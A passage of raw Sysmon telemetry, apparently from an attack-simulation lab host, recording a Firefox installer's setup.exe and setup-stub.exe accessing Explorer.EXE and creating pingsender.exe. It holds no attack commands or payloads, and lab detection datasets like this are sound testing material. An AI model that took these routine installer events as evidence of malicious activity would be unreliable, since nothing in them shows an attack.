\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\pingsender.exe2021-01-18 13:59:52.489 10341000x800000000000000015245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000015236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000015235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
